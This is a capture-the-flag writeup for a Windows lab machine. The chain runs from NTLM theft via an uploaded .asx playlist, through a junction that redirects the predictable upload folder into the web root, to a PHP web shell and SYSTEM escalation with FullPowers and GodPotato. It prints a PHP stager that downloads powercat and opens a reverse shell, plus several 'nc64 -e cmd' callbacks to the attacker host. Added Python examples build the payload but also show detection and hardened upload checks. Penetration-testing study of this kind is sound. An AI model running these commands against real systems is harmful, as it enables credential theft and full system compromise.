
Machine (Medium) - Media

Writeup for the Media machine, a medium-level Windows box. The chain is: leak a Net-NTLMv2 response by uploading a Windows Media Player playlist that points at our SMB server, crack it and log in over SSH, then escalate to SYSTEM by redirecting the web app's predictable upload folder into the web root with a directory junction and finishing with token impersonation (FullPowers followed by GodPotato).

Writeup Author: BobBuilder


Objective: Capture NTLM credentials via a malicious upload, gain SSH access, and escalate to SYSTEM via predictable folder creation and impersonation.

Category: Machine
Difficulty: Medium
Platform: Windows
Machine Author: enox


User

Step 1: Identify Web Upload Vulnerability

The website running on port 80 includes a form asking for a "brief introduction video (compatible with Windows Media Player)." Whoever reviews the submission opens it in Windows Media Player, so an .asx playlist whose entry points at a UNC path on our host makes the player fetch the file over SMB. Windows authenticates to that share automatically, and the reviewer's Net-NTLMv2 response lands on our listener.

We generate a malicious .asx file with ntlm_theft, which writes nt/nt.asx (along with the other file types it supports):

python3 ntlm_theft.py --generate all --server <attacker_ip> --filename nt

We then upload nt.asx using the video submission form. Responder must already be listening on the interface facing the target before the upload, otherwise the authentication attempt has nothing to connect to.
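To make the mechanism concrete, here is an added example that is not part of the original writeup or of ntlm_theft: it shows what the .asx payload boils down to (a single <ref> whose href is a UNC path on our host) and, for the defender's side, the check an upload handler would need to reject such a file. The IP address, share name and file name are made up for the example.

```python
import re

# Constructed values for the example; in a real engagement these are the
# attacker's IP and whatever share name the SMB listener answers for.
ATTACKER = "10.10.14.5"


def build_asx(server: str, share: str = "share", name: str = "nt.wma") -> str:
    """Minimal Windows Media Player playlist with one entry pointing at a UNC
    path. Opening it makes the player (hence the Windows SMB client) try to
    fetch \\server\share\name, which triggers NTLM authentication to `server`."""
    unc = f"\\\\{server}\\{share}\\{name}"
    return (
        '<asx version="3.0">\n'
        '  <title>Introduction</title>\n'
        '  <entry>\n'
        '    <title>intro</title>\n'
        f'    <ref href="{unc}" />\n'
        '  </entry>\n'
        '</asx>\n'
    )


# ASX is not strict XML (tags are case-insensitive, '&' is often left
# unescaped), so a tolerant regex over href attributes is more robust than
# an XML parser for a server-side filter.
_HREF = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def unc_refs(asx_text: str) -> list[str]:
    """Return every <ref> target that would make the viewer reach a host of
    the submitter's choosing over SMB: UNC paths (\\host\share or //host/share)
    and file: URLs. An upload handler should reject the file if this is non-empty."""
    flagged = []
    for href in _HREF.findall(asx_text):
        h = href.strip().lower()
        if h.startswith("\\\\") or h.startswith("//") or h.startswith("file:"):
            flagged.append(href)
    return flagged


if __name__ == "__main__":
    payload = build_asx(ATTACKER)
    print(payload)
    print("flagged:", unc_refs(payload))
```

The same filter should run on the other playlist and shortcut formats ntlm_theft emits; this block only covers .asx, the type the form accepts.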

Step 2: Capture NTLM Hash with Responder

Responder receives a Net-NTLMv2 response from the user enox. This is a challenge-response, not the account's NT hash, so it cannot be used for pass-the-hash, but it can be cracked offline; john (or hashcat mode 5600) recovers the plaintext password (redacted).

Step 3: SSH Access with Captured Credentials

ssh enox@<media_ip>

We successfully log in and retrieve the user flag from:

C:\Users\enox\Desktop\user.txt

Root

Step 1: Analyze Upload Logic

The main site (index.php) handles form input and uploads files to:

C:\Windows\Tasks\Uploads\<md5(firstname.lastname.email)>\

The script derives the upload folder from md5() of the user-supplied first name, last name and e-mail, so anyone who knows the values submitted in the form knows the directory name in advance. Since the Uploads tree sits where our SSH user can create and delete entries, we control what the web server finds at that path.

Step 2: Abuse Symlink to Redirect Uploads

We calculate the folder name from exactly the values we will submit in the form (the separator and any trimming or lowercasing must match what index.php does, or the digest will differ):

echo -n "firstname.lastname.email" | md5sum

Then we delete the original upload folder and replace it with a directory junction of the same name that points at the web root. When the file is re-uploaded through the form, PHP writes it through the junction, so it lands in the web root where it can be requested by URL and executed.
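Added example, not from the writeup: the folder-name prediction and the junction redirect replayed in Python on a temporary directory tree, with a symlink standing in for the Windows junction and an assumed web-root name (the real web-root path is not given above). It also shows the checks a hardened upload handler would make so the same trick fails.

```python
import hashlib
import os
import secrets
import tempfile

# Sample form values, constructed for this example.
FIRST, LAST, EMAIL = "John", "Doe", "john@example.com"


def predicted_upload_dir(firstname: str, lastname: str, email: str) -> str:
    """Reproduce the folder name index.php derives with md5(): the hex digest
    of the dot-separated fields. PHP's md5() returns lowercase hex, as does
    hashlib. Confirm the exact expression (separator, trim(), strtolower())
    in the PHP source: any difference changes the digest."""
    return hashlib.md5(f"{firstname}.{lastname}.{email}".encode()).hexdigest()


def vulnerable_save(base: str, folder: str, name: str, data: bytes) -> str:
    """The page's upload logic: trust the derived folder and write into it.
    If the attacker has already replaced the folder with a junction (here a
    symlink stands in for a Windows junction), the write follows it out of
    `base`. Returns the path the file really landed at."""
    target = os.path.join(base, folder)
    os.makedirs(target, exist_ok=True)          # tolerates the planted link
    path = os.path.join(target, name)
    with open(path, "wb") as fh:
        fh.write(data)
    return os.path.realpath(path)


def hardened_save(base: str, folder: str, name: str, data: bytes) -> str:
    """Same operation with the checks the page's handler lacks: create the
    folder exclusively (abort if anything already sits at that name), refuse
    a link, make sure the resolved path is still under `base`, and create the
    file with O_EXCL so nothing is overwritten. On Windows also test
    os.path.isjunction() (Python 3.12+), because a junction is not a symlink."""
    target = os.path.join(base, folder)
    os.makedirs(target, exist_ok=False)         # FileExistsError if pre-planted
    if os.path.islink(target):
        raise PermissionError("upload dir is a link")
    real_base = os.path.realpath(base) + os.sep
    path = os.path.join(target, os.path.basename(name))
    if not os.path.realpath(path).startswith(real_base):
        raise PermissionError("upload path escapes base")
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Play the attack in a temp tree: Uploads stands in for
    C:\\Windows\\Tasks\\Uploads and htdocs for the web root (assumed name)."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "Uploads")
    webroot = os.path.join(root, "htdocs")
    os.makedirs(uploads)
    os.makedirs(webroot)

    folder = predicted_upload_dir(FIRST, LAST, EMAIL)
    # The low-privileged SSH user plants the link before re-submitting the form.
    os.symlink(webroot, os.path.join(uploads, folder))

    landed = vulnerable_save(uploads, folder, "shell.php", b"<?php phpinfo(); ?>")
    try:
        hardened_save(uploads, folder, "shell.php", b"<?php phpinfo(); ?>")
        blocked = False
    except (FileExistsError, PermissionError):
        blocked = True
    # A legitimate upload into an unpredictable folder still works.
    clean = hardened_save(uploads, secrets.token_hex(16), "intro.wmv", b"\x30\x26\xb2\x75")

    return {
        "folder": folder,
        "landed_in_webroot": landed.startswith(os.path.realpath(webroot) + os.sep),
        "blocked": blocked,
        "clean_under_uploads": os.path.realpath(clean).startswith(os.path.realpath(uploads) + os.sep),
    }


if __name__ == "__main__":
    print(demo())
```

Two properties are broken on the box and fixed in hardened_save: the folder name is predictable (use a random token instead of md5 over form fields), and the handler writes into whatever already exists at that name (create exclusively and refuse reparse points).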

Step 3: Gain Web Shell

We upload a PHP stager named shell.php using the upload form. It downloads powercat from our HTTP server and connects back to port 4444, so a web server hosting powercat.ps1 and a listener on 4444 must be running before it is requested:

<?php
// Fetch powercat from the attacker's HTTP server and connect back with a cmd shell
system('powershell -c "IEX(New-Object System.Net.WebClient).DownloadString(\'http://<attacker_ip>/powercat.ps1\'); powercat -c <attacker_ip> -p 4444 -e cmd"');
?>

We then trigger the shell by visiting:

http://<media_ip>/shell.php

This gives us a shell as NT AUTHORITY\LOCAL SERVICE, the account the web server runs under.

Step 4: Restore Missing Privileges with FullPowers

LOCAL SERVICE normally holds SeImpersonatePrivilege, but the web server's process token has been stripped of its default privileges (whoami /priv shows almost none), so the usual Potato-style escalation is not possible yet. FullPowers recovers the account's full default privilege set by having the Task Scheduler start a new process as the same service account; -c runs our command in that process and -z makes it non-interactive:

.\FullPowers.exe -c "C:\temp\nc64.exe <attacker_ip> 443 -e cmd" -z

The new shell that connects back carries the missing privileges, including SeImpersonatePrivilege, which whoami /priv now confirms.

Step 5: Exploit SeImpersonatePrivilege with GodPotato

With SeImpersonatePrivilege available, GodPotato obtains a SYSTEM token from the RPCSS service and runs our command under it. Start a fresh listener on 443 first (the previous one is occupied by the FullPowers shell), and use the GodPotato build matching the .NET version installed on the box:

.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe <attacker_ip> 443"

This spawns a shell as NT AUTHORITY\SYSTEM.